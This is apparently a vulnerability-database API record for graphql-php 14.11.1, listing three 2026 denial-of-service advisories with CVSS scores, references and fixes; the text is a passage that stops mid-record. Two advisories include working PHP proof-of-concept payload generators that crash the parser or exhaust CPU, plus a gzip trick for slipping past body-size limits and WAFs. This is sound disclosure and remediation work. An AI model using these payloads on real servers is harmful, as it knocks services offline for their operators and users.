Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1022133?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1022133?format=api", "purl": "pkg:composer/webonyx/graphql-php@14.11.1", "type": "composer", "namespace": "webonyx", "name": "graphql-php", "version": "14.11.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "15.32.3", "latest_non_vulnerable_version": "15.32.3", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90173?format=api", "vulnerability_id": "VCID-1fd5-xc7n-vygp", "summary": "graphql-php is affected by a Denial of Service via quadratic complexity in OverlappingFieldsCanBeMerged validation\nThe `OverlappingFieldsCanBeMerged` validation rule exhibits quadratic time complexity when processing queries with many repeated fields sharing the same response name. An attacker can send a crafted query like `{ hello hello hello ... }` with thousands of repeated fields, causing excessive CPU usage during validation before execution begins.\n\nThis is not mitigated by existing QueryDepth or QueryComplexity rules.\n\n**Observed impact (tested on v15.31.4):**\n- 1000 fields: ~0.6s\n- 2000 fields: ~2.4s\n- 3000 fields: ~5.3s\n- 5000 fields: request timeout (>20s)\n\n**Root cause:** `collectConflictsWithin()` performs O(n²) pairwise comparisons of all fields with the same response name. For identical repeated fields, every comparison returns \"no conflict\" but the quadratic iteration count causes resource exhaustion.\n\n**Fix:** Deduplicate structurally identical fields before pairwise comparison, reducing the complexity from O(n²) to O(u²) where u is the number of unique field signatures (typically 1 for this attack pattern).\n\n**Credit:** Ashwak N (ashwakn04@gmail.com)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40476", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.0958", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09529", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09499", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.0956", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09558", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40476" }, { "reference_url": "https://github.com/webonyx/graphql-php", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php" }, { "reference_url": "https://github.com/webonyx/graphql-php/releases/tag/v15.31.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:53:06Z/" } ], "url": "https://github.com/webonyx/graphql-php/releases/tag/v15.31.5" }, { "reference_url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-68jq-c3rv-pcrr", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:53:06Z/" } ], "url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-68jq-c3rv-pcrr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40476", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40476" }, { "reference_url": "https://github.com/advisories/GHSA-68jq-c3rv-pcrr", "reference_id": "GHSA-68jq-c3rv-pcrr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68jq-c3rv-pcrr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111505?format=api", "purl": "pkg:composer/webonyx/graphql-php@15.31.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-84sv-c4se-vkgu" }, { "vulnerability": "VCID-mvyr-p2h6-fybm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/webonyx/graphql-php@15.31.5" } ], "aliases": [ "CVE-2026-40476", "GHSA-68jq-c3rv-pcrr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1fd5-xc7n-vygp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94925?format=api", "vulnerability_id": "VCID-84sv-c4se-vkgu", "summary": "webonyx/graphql-php has unbounded recursion in parser that causes stack overflow on crafted nested input\n## Summary\n\n`GraphQL\\Language\\Parser` is a recursive descent parser with no recursion depth limit and no `zend.max_allowed_stack_size` interaction. Crafted nested queries trigger a SIGSEGV in the PHP runtime, killing the FPM/CLI worker process. Smallest crashing payload is approximately 74 KB.\n\n## Affected Component\n\n- `src/Language/Parser.php` -- the `Parser` class (no recursion depth tracking)\n- `src/Language/Lexer.php` -- the `Lexer` class\n\n## Severity\n\n**HIGH (8.2)** -- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\n\nIntegrity is Low because the entire PHP process (FPM worker, CLI process, Swoole worker, RoadRunner worker, etc.) is terminated by SIGSEGV. Every concurrent request handled by the same process is dropped along with the attacker's request, with no error message, no log entry, and no recovery path beyond restart. The 74 KB minimum crashing payload sits well below any common HTTP body size limit, and the failure mode is **the worst possible**: not catchable, not observable, no diagnostics.\n\n## Description\n\n`GraphQL\\Language\\Parser` parses GraphQL documents using mutually recursive PHP methods (`parseValueLiteral`, `parseObject`, `parseObjectField`, `parseList`, `parseSelectionSet`, `parseSelection`, `parseField`, `parseTypeReference`, `parseInlineFragment`). The constructor (`Parser.php:325`) accepts only three options:\n\n```php\n// src/Language/Parser.php:64\n/**\n * @phpstan-type ParserOptions array{\n * noLocation?: bool,\n * allowLegacySDLEmptyFields?: bool,\n * allowLegacySDLImplementsInterfaces?: bool,\n * }\n */\n```\n\nThere is **no `maxTokens`, no `maxDepth`, no `maxRecursionDepth`, no token counter, and no recursion depth counter** anywhere in the parser or lexer. PHP recursion is bounded only by the C stack size (typically 8 MB via `ulimit -s 8192`).\n\nWhen the C stack is exhausted by graphql-php's recursive parser, **PHP segfaults**. The PHP 8.3 runtime ships with `zend.max_allowed_stack_size` (default 0 = auto-detect), which is supposed to convert userland recursion overflow into a catchable `Stack overflow detected` error. **In practice, this protection does not catch the graphql-php parser overflow**: testing with PHP 8.3.30 in default Docker configuration, every crashing depth produces SIGSEGV (exit code 139), not a catchable error.\n\nThis finding has been tested against the **latest stable release `webonyx/graphql-php@v15.31.4`** running on PHP 8.3.30.\n\n## Root Cause\n\n```php\n// src/Language/Parser.php:168\nclass Parser\n{\n // ... no recursionDepth field ...\n private Lexer $lexer;\n\n // src/Language/Parser.php:325\n public function __construct($source, array $options = [])\n {\n $sourceObj = $source instanceof Source\n ? $source\n : new Source($source);\n $this->lexer = new Lexer($sourceObj, $options);\n }\n```\n\nThere is no field tracking recursion depth. Every recursive parse method calls itself without bound. PHP function call frames are small (~256 bytes each), but the cumulative depth needed by recursive descent for a GraphQL value literal exhausts an 8 MB stack at approximately 26,000-37,000 levels of input nesting (depending on the call chain depth per AST level).\n\n## Proof of Concept\n\n```php\n// composer require webonyx/graphql-php:v15.31.4\n<?php\nrequire __DIR__.'/vendor/autoload.php';\nuse GraphQL\\Language\\Parser;\n\n// Each invocation tests one (vector, depth) pair so we can observe per-process\n// exit code. SIGSEGV cannot be caught by PHP try/catch.\n$v = $argv[1]; $d = (int)$argv[2];\n\nswitch ($v) {\n case 'A': $q = \"{ a(x: \" . str_repeat('{a: ', $d) . '1' . str_repeat('}', $d) . \") }\"; break;\n case 'B': $q = str_repeat('{ a', $d) . str_repeat(' }', $d); break;\n case 'C': $q = \"{ a(x: \" . str_repeat('[', $d) . '1' . str_repeat(']', $d) . \") }\"; break;\n case 'D': $q = \"query(\\$v: \" . str_repeat('[', $d) . \"Int\" . str_repeat(']', $d) . \") { a }\"; break;\n}\n\ntry {\n Parser::parse($q);\n echo \"OK depth=$d size=\" . strlen($q) . \"\\n\";\n} catch (\\Throwable $e) {\n echo \"ERR \" . get_class($e) . \": \" . substr($e->getMessage(), 0, 80) . \"\\n\";\n exit(1);\n}\n```\n\n### Crash thresholds measured on `webonyx/graphql-php@v15.31.4`, PHP 8.3.30, ulimit -s 8192, Linux x86_64\n\nEach vector was bisected to find the smallest crashing depth. Process exit code 139 = 128 + SIGSEGV (11).\n\n| Vector | Recursive call chain | last_OK_depth | crash_depth | Crash payload size |\n|--------|----------------------|---:|---:|---:|\n| A: nested object values `{a:{a:..}}` | `parseValueLiteral` -> `parseObject` -> `parseObjectField` -> `parseValueLiteral` | 25,781 | **26,250** | ~129 KB |\n| B: nested selection sets `{a{a{..}}}` | `parseSelectionSet` -> `parseSelection` -> `parseField` -> `parseSelectionSet` | 25,781 | **26,250** | ~129 KB |\n| C: nested list values `[[..1..]]` | `parseValueLiteral` -> `parseList` -> `parseValueLiteral` | 37,187 | **37,500** | **~74 KB** |\n| D: nested list types `[[Int]]` | `parseTypeReference` -> `parseTypeReference` | 87,187 | **87,500** | ~174 KB |\n\nThe smallest reliable crashing payload is **vector C (nested list values) at approximately 74 KB**. All four vectors stay under any field, complexity, or depth validation rule because they crash at parse time, before validation runs.\n\n### Process exit observed\n\n```\n$ php -d xdebug.mode=off poc_one.php C 37500\n$ echo $?\n139\n$\n```\n\nStandard error contains no PHP error message, no stack trace, no log entry. The process is killed by the kernel via SIGSEGV. In a php-fpm deployment, the FPM master logs `WARNING: [pool www] child 12345 exited on signal 11 (SIGSEGV)` and respawns the worker, dropping any in-flight requests on that worker.\n\n### `zend.max_allowed_stack_size` does not help\n\nPHP 8.3 introduced `zend.max_allowed_stack_size` (default 0 = auto-detect from `pthread_attr_getstacksize`) to detect userland recursion overflow and raise a catchable `Stack overflow detected` error. In testing against graphql-php v15.31.4, this protection does **not** prevent the segfault:\n\n```\n=== Default settings ===\n$ php -d xdebug.mode=off poc.php A 30000\nSegmentation fault\nEXIT=139\n\n=== zend.max_allowed_stack_size=2M ===\n$ php -d zend.max_allowed_stack_size=2097152 poc.php A 30000\nSegmentation fault\nEXIT=139\n\n=== zend.max_allowed_stack_size=1M, reserved=128K ===\n$ php -d zend.max_allowed_stack_size=1048576 -d zend.reserved_stack_size=131072 poc.php A 30000\nSegmentation fault\nEXIT=139\n\n=== ulimit -s 4096, default zend settings ===\n$ php -d xdebug.mode=off poc.php A 15000\nSegmentation fault\nEXIT=139\n```\n\nEvery configuration tested produces SIGSEGV. The runtime check is not catching this overflow class, possibly because the per-frame stack consumption is below the per-call check granularity, or because the auto-detection of the available stack diverges from the actual `ulimit -s` in containerized environments. Either way, default PHP 8.3 configurations as shipped by official Docker images do not protect against this.\n\n## Why try/catch cannot help\n\nPHP's `try { Parser::parse($q); } catch (\\Throwable $e) { ... }` cannot catch SIGSEGV. The signal is delivered by the kernel after the C stack pointer crosses the guard page; the PHP runtime never gets a chance to raise a userland exception. The process exits with status 139 and the `catch` block is never entered.\n\n## Impact\n\n- **Process termination**: a single 74 KB POST kills the entire PHP process that handles it. In php-fpm, the worker is killed and respawned by the master; every other in-flight request on that worker is dropped. In long-running PHP runtimes (Swoole, RoadRunner, ReactPHP), the entire daemon dies.\n- **Pre-validation**: `Parser::parse` is invoked before any validation rule. Field count caps, complexity analyzers, persisted query allow-lists, and all custom validators run after parsing and therefore cannot intercept the crash.\n- **No catchable error**: unlike a slow query, a memory_limit exceeded, or a parse error, SIGSEGV cannot be intercepted by PHP. There is no error log entry from the PHP application; only the FPM master log shows `child exited on signal 11`.\n- **Tiny payload**: 74 KB is well below every common HTTP body size limit. The query is also extremely compressible: `[` repeated 37,500 times compresses to a few hundred bytes via gzip, bypassing nginx `client_max_body_size`, AWS ALB body-size caps, and WAF inspection of the encoded payload.\n- **Ecosystem reach**: webonyx/graphql-php is the parser used by **Lighthouse** (Laravel), **Overblog/GraphQLBundle** (Symfony), **wp-graphql** (WordPress), **Drupal GraphQL module**, and the majority of PHP GraphQL servers. Any of these is exposed unless the front layer rejects the decompressed payload before reaching the parser.\n\n## Affected Versions\n\n- **`webonyx/graphql-php@v15.31.4`** (latest stable as of 2026-04-08): all four vectors confirmed by direct measurement.\n- The recursive descent design has been unchanged since the parser was rewritten in v15.x. Earlier 15.x and 14.x releases share the same code path and are believed vulnerable but were not retested individually.\n\n## Remediation\n\n### Option 1 -- Add a parser-level recursion depth counter (recommended)\n\nAdd a `recursionDepth` and `maxRecursionDepth` field to `GraphQL\\Language\\Parser`. Increment at the entry of each recursive method, decrement on return, and throw a `SyntaxError` when it exceeds the configured limit. A sensible default is 256: well above any realistic legitimate query, and approximately 100x below the smallest current crash threshold.\n\n```php\n// src/Language/Parser.php\nclass Parser\n{\n private int $recursionDepth = 0;\n private int $maxRecursionDepth;\n\n public function __construct($source, array $options = [])\n {\n $this->maxRecursionDepth = $options['maxRecursionDepth'] ?? 256;\n // ... existing body ...\n }\n\n private function parseValueLiteral(bool $isConst): ValueNode\n {\n if (++$this->recursionDepth > $this->maxRecursionDepth) {\n throw new SyntaxError(\n $this->lexer->source,\n $this->lexer->token->start,\n \"Document exceeds maximum allowed recursion depth of {$this->maxRecursionDepth}.\"\n );\n }\n try {\n // ... existing body ...\n } finally {\n --$this->recursionDepth;\n }\n }\n}\n```\n\nApply the same pattern to `parseSelectionSet`, `parseObject`, `parseObjectField`, `parseList`, `parseTypeReference`, `parseInlineFragment`, and `parseField`. The thrown `SyntaxError` is a normal PHP exception and is fully catchable by user code.\n\n### Option 2 -- Iterative parsing for the deepest call chains\n\nRewrite `parseValueLiteral` / `parseObject` / `parseList` and `parseTypeReference` using an explicit work stack instead of mutual recursion. This removes the call frame budget entirely for those vectors but does not address `parseSelectionSet`, which is harder to convert.\n\n### Option 3 -- Recommend a token limit option in addition to depth\n\ngraphql-php currently has **no token limit option at all**. Adding a `maxTokens` parser option would provide defense in depth even if the recursion limit is misconfigured.\n\nThe strongest fix is Option 1 with a non-zero default for `maxRecursionDepth`.\n\n## Audit status of related parser-side findings on graphql-php 15.31.4\n\nThe following two related parser/validator findings were tested against `webonyx/graphql-php@v15.31.4`.\n\n### Token-limit comment bypass\n\n**Not applicable**: graphql-php exposes **no `maxTokens` option of any kind**. The bypass class does not apply because there is no token counter to bypass. However, this is itself a finding worth documenting: graphql-php has **no parser-side resource limits whatsoever**. A 391 KB comment-padded payload (100,000 comment lines) is parsed in 193 ms with a +18.4 MB heap delta, with no upper bound. Operators relying on graphql-php as their primary line of defense have no parser-level mitigation against query-size DoS, only the global `memory_limit` and PHP's `post_max_size`.\n\nThe `Lexer::lookahead` method does loop while `$token->kind === Token::COMMENT` (so comments are silently consumed before any per-token check would run), but in graphql-php this is moot because there is no `maxTokens` counter to bypass in the first place.\n\n### `OverlappingFieldsCanBeMerged` validation DoS\n\ngraphql-php **is** vulnerable. `src/Validator/Rules/OverlappingFieldsCanBeMerged.php:311` contains an `O(n^2)` pairwise loop, and inline fragments are flattened into the same `$astAndDefs` map at line 266 (`case $selection instanceof InlineFragmentNode: $this->internalCollectFieldsAndFragmentNames(... $astAndDefs ...)`), bypassing the named-fragment cache. Measured validation cost: 117 seconds for a 364 KB query (200 outer x 100 inner inline fragments). This is documented in a separate advisory: see `GHSA_REPORT_GRAPHQL_PHP_15-31-4_OVERLAPPING_FIELDS.md`.\n\nThis audit covers the three parser-side and validation-side findings tracked together for this implementation. The parser stack overflow documented above and the `OverlappingFieldsCanBeMerged` validation DoS are exploitable on graphql-php 15.31.4; the token-limit comment bypass is not applicable because there is no token limit option to bypass (which is itself a defense-in-depth gap).\n\n## Resources\n\n- PHP documentation [`zend.max_allowed_stack_size`](https://www.php.net/manual/en/ini.core.php#ini.zend.max-allowed-stack-size) -- introduced in PHP 8.3\n- Linux signal(7) -- SIGSEGV (signal 11) is delivered by the kernel for invalid memory access; PHP cannot intercept it\n- Companion advisory for this implementation: `OverlappingFieldsCanBeMerged` quadratic validation DoS via flattened inline fragments (Quadratic validation cost in OverlappingFieldsCanBeMerged via inline fragments).", "references": [ { "reference_url": "https://github.com/webonyx/graphql-php", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php" }, { "reference_url": "https://github.com/webonyx/graphql-php/commit/7b7f2080ca5f7d5340a696fc5701b19a9222d2c2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/commit/7b7f2080ca5f7d5340a696fc5701b19a9222d2c2" }, { "reference_url": "https://github.com/webonyx/graphql-php/releases/tag/v15.32.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/releases/tag/v15.32.3" }, { "reference_url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-r7cg-qjjm-xhqq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-r7cg-qjjm-xhqq" }, { "reference_url": "https://github.com/advisories/GHSA-r7cg-qjjm-xhqq", "reference_id": "GHSA-r7cg-qjjm-xhqq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7cg-qjjm-xhqq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/118186?format=api", "purl": "pkg:composer/webonyx/graphql-php@15.32.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/webonyx/graphql-php@15.32.3" } ], "aliases": [ "GHSA-r7cg-qjjm-xhqq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-84sv-c4se-vkgu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95082?format=api", "vulnerability_id": "VCID-mvyr-p2h6-fybm", "summary": "webonyx/graphql-php has quadratic validation cost in OverlappingFieldsCanBeMerged via inline fragments\n## Summary\n\n`OverlappingFieldsCanBeMerged` validation rule has `O(n^2 x m^2)` worst case via flattened inline fragments. The CVE-2023-26144 named-fragment cache does not cover inline fragments. A 364 KB query (200 outer x 100 inner inline fragments) consumes 117 seconds of CPU per request, with no comparison budget and no validation timeout.\n\n## Affected Component\n\n`src/Validator/Rules/OverlappingFieldsCanBeMerged.php`\n\n## Description\n\ngraphql-php is a PHP port of graphql-js and inherits the same `OverlappingFieldsCanBeMerged` algorithm. The rule performs an explicit `O(n^2)` pairwise comparison loop over fields collected for each response name (`collectConflictsWithin`), and recurses into sub-selections via `findConflict`. When the rule receives a query in which several inline fragments select the same response name at multiple nesting levels, the cost compounds to `O(n^2 x m^2)` where `n` and `m` are the number of inline fragments at the outer and inner levels respectively.\n\ngraphql-php includes a `comparedFragmentPairs` PairSet cache (the same class of memoization fix tracked under [CVE-2023-26144 / GHSA-9pv7-vfvm-6vr7](https://github.com/advisories/GHSA-9pv7-vfvm-6vr7)) but it is keyed by **named fragment** identity. Inline fragments have no name; they are flattened into the parent `$astAndDefs` map by the `case $selection instanceof InlineFragmentNode` branch starting at `OverlappingFieldsCanBeMerged.php:266`, so they are never observed by the cache. Every pair must be re-compared from scratch on every nesting level.\n\nThis finding has been tested against the **latest stable release `webonyx/graphql-php@v15.31.4`** running on PHP 8.3.30.\n\n## Root Cause\n\n### 1. Pairwise `O(n^2)` loop (`collectConflictsWithin`)\n\n```php\n// src/Validator/Rules/OverlappingFieldsCanBeMerged.php:306\n$fieldsLength = count($fields);\n\nif ($fieldsLength > 1) {\n for ($i = 0; $i < $fieldsLength; ++$i) { // line 311\n for ($j = $i + 1; $j < $fieldsLength; ++$j) { // line 312\n $conflict = $this->findConflict(\n $context,\n $parentFieldsAreMutuallyExclusive,\n $responseName,\n $fields[$i],\n $fields[$j]\n );\n // ...\n }\n }\n}\n```\n\n`count($fields)` grows without bound when multiple inline fragments select the same response name in the same parent selection set.\n\n### 2. Inline fragment flattening (`internalCollectFieldsAndFragmentNames`)\n\n```php\n// src/Validator/Rules/OverlappingFieldsCanBeMerged.php:266\ncase $selection instanceof InlineFragmentNode:\n $typeCondition = $selection->typeCondition;\n $inlineFragmentType = $typeCondition === null\n ? $parentType\n : AST::typeFromAST([$context->getSchema(), 'getType'], $typeCondition);\n\n $this->internalCollectFieldsAndFragmentNames(\n $context,\n $inlineFragmentType,\n $selection->selectionSet,\n $astAndDefs, // flattened into the parent map\n $fragmentNames\n );\n break;\n```\n\n`N` inline fragments selecting the same response name produce `N` entries in `$astAndDefs[$responseName]`, which then trigger `N*(N-1)/2` `findConflict` calls.\n\n### 3. The named-fragment cache does not cover this code path\n\n```php\n// src/Validator/Rules/OverlappingFieldsCanBeMerged.php:41\nprotected PairSet $comparedFragmentPairs;\n\n// :54 (in __construct)\n$this->comparedFragmentPairs = new PairSet();\n```\n\n`PairSet` is keyed by `(fragmentName1, fragmentName2)`. Inline fragments have no name; they are folded into the parent selection set before the cache is even consulted. The CVE-2023-26144 fix has zero effect on this code path.\n\n### 4. No comparison budget, no validation timeout\n\nThere is no counter shared across `collectConflictsWithin`, `collectConflictsBetween`, and the recursive `findConflict` calls. The rule runs to completion regardless of cost. graphql-php exposes no `validate_timeout` equivalent.\n\n## Proof of Concept\n\n```php\n<?php\n// composer require webonyx/graphql-php:v15.31.4\nrequire __DIR__.'/vendor/autoload.php';\n\nuse GraphQL\\Language\\Parser;\nuse GraphQL\\Validator\\DocumentValidator;\nuse GraphQL\\Utils\\BuildSchema;\n\n$schema = BuildSchema::build('type Query { field: Node } type Node { f: Node, g: Node, x: String }');\n\nfunction gen(int $n, int $m): string {\n $inner = implode(' ', array_fill(0, $m, '... on Node { x }'));\n $outer = implode(' ', array_fill(0, $n, \"... on Node { f { $inner } }\"));\n return \"{ field { $outer } }\";\n}\n\necho \" N M | size | validate ms | errors\\n\";\necho \"---------|-----------|-------------|--------\\n\";\nforeach ([[20,20],[50,50],[100,50],[100,100],[150,100],[200,100]] as [$n, $m]) {\n $q = gen($n, $m);\n $doc = Parser::parse($q);\n $t0 = microtime(true);\n $errors = DocumentValidator::validate($schema, $doc);\n $elapsed = round((microtime(true) - $t0) * 1000);\n printf(\"%4d %4d | %7dB | %10d | %d\\n\", $n, $m, strlen($q), $elapsed, count($errors));\n}\n```\n\n### Measured output on `webonyx/graphql-php@v15.31.4`, PHP 8.3.30, Linux x86_64\n\n```\ngraphql-php version: v15.31.4\nPHP version: 8.3.30\n\n N M | size | validate ms | errors\n---------|-----------|-------------|--------\n 20 20 | 7653B | 71 | 0\n 50 50 | 46113B | 2020 | 0\n 100 50 | 92213B | 7762 | 0\n 100 100 | 182213B | 29660 | 0\n 150 100 | 273313B | 66052 | 0\n 200 100 | 364413B | 117082 | 0\n```\n\nThe growth confirms `O(N^2)` outer scaling: doubling N from 100 to 200 (with M=100 fixed) increases validation time from 29,660 ms to 117,082 ms, a factor of approximately 4. A single 364 KB query consumes **117 seconds** of CPU on one PHP worker with no errors emitted, no timeout, and no remediation.\n\n## Impact\n\n- **Default-on rule**: `OverlappingFieldsCanBeMerged` is part of the rules registered by `DocumentValidator::defaultRules()` and is enabled by default in `DocumentValidator::validate()`. Every Lighthouse, Overblog/GraphQLBundle, wp-graphql, and Drupal GraphQL module application using the standard validation pipeline is exposed.\n- **Pre-execution**: the cost is in the validation phase. `QueryComplexity` and `QueryDepth` rules cannot help: the example query has depth 3 and complexity 1.\n- **PHP `max_execution_time` hits the wall too late**: a default Lighthouse/Laravel deployment ships with `max_execution_time = 30` seconds. A single 100x100 request takes 29.6 seconds in graphql-php, just inside the limit. A 150x100 request takes 66 seconds and will be killed by `max_execution_time`, but the worker has already burned 30 seconds of CPU per request before being killed; an attacker can sustain that load with low-RPS traffic.\n- **Body-size and WAF bypass via gzip**: the payload is the same string repeated N times. A 364 KB raw payload compresses to a few kilobytes via gzip. Any graphql-php deployment behind nginx, Apache, or a CDN with default body-size handling will accept the compressed request and decompress it before reaching the validator.\n- **php-fpm worker pool exhaustion**: each request consumes one full PHP worker process. A typical php-fpm pool has 5-50 workers; an attacker firing a handful of parallel requests pins the entire pool for the duration of the validation.\n- **Existing CVE-2023-26144 fix is insufficient**: the published `PairSet` cache only memoizes named-fragment comparisons, not the inline-fragment flattening path.\n\nThis is the same vulnerability class as **CVE-2023-26144** (partially fixed by named-fragment memoization only) and **CVE-2023-28867** (fully fixed via the Adameit algorithm). Both fixes pre-date this finding.\n\n## Affected Versions\n\n- **`webonyx/graphql-php@v15.31.4`** (latest stable as of 2026-04-08): all measurements above were collected on this version with no custom configuration.\n- All versions of `webonyx/graphql-php` that ship `OverlappingFieldsCanBeMerged` (effectively all 15.x and 14.x stable releases). They share the same code path and are believed vulnerable but were not retested individually.\n\n## Remediation\n\nThree options ordered from best to minimal:\n\n### Option 1 -- Adopt the Adameit algorithm\n\nReplace pairwise comparison with the uniqueness-check algorithm designed by Simon Adameit, used today by graphql-java (post CVE-2023-28867) and Sangria. The algorithm transforms conflict-freedom into a uniqueness requirement and runs in `O(n log n)` instead of `O(n^2)`. See [graphql/graphql-js issue #2185](https://github.com/graphql/graphql-js/issues/2185) for the design discussion and the [Sangria PR #12](https://github.com/sangria-graphql-org/sangria/pull/12) for the original implementation.\n\n### Option 2 -- Comparison budget\n\nAdd a comparison counter on `OverlappingFieldsCanBeMerged` shared across `collectConflictsWithin`, `collectConflictsBetween`, and the recursive `findConflict` calls. Throw a `Error` after a configurable threshold (for example 10,000 comparisons by default). This is the approach graphql-java implemented after CVE-2023-28867.\n\n### Option 3 -- Cap inline-fragment flattening\n\nIn `internalCollectFieldsAndFragmentNames`, cap `count($astAndDefs[$responseName])` at a configurable limit (for example 1,000) and emit a validation error if exceeded. This is a narrower fix that targets the specific bypass path but does not address other potential `O(n^2)` surfaces.\n\n## Resources\n\n- [CVE-2023-26144 -- graphql-js (partial fix, named-fragment cache only)](https://github.com/advisories/GHSA-9pv7-vfvm-6vr7)\n- [CVE-2023-28867 -- graphql-java (full fix via Adameit algorithm)](https://github.com/advisories/GHSA-p4qx-6w5p-4rj2)\n- [graphql-js Issue #2185 -- Faster algorithm for OverlappingFieldsCanBeMerged](https://github.com/graphql/graphql-js/issues/2185)\n- [Sangria PR #12 -- original optimised implementation](https://github.com/sangria-graphql-org/sangria/pull/12)\n- [GraphQL spec section 5.3.2 -- Field Selection Merging](https://spec.graphql.org/October2021/#sec-Field-Selection-Merging)\n- Companion advisory for this implementation: `GraphQL\\Language\\Parser` parser stack overflow via deeply nested queries (Unbounded recursion in parser causes stack overflow on crafted nested input).", "references": [ { "reference_url": "https://github.com/graphql/graphql-js/issues/2185", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": 